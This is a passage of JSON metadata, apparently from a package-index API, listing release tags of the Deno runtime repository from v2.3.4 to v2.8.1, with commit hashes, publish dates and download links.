"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/Gi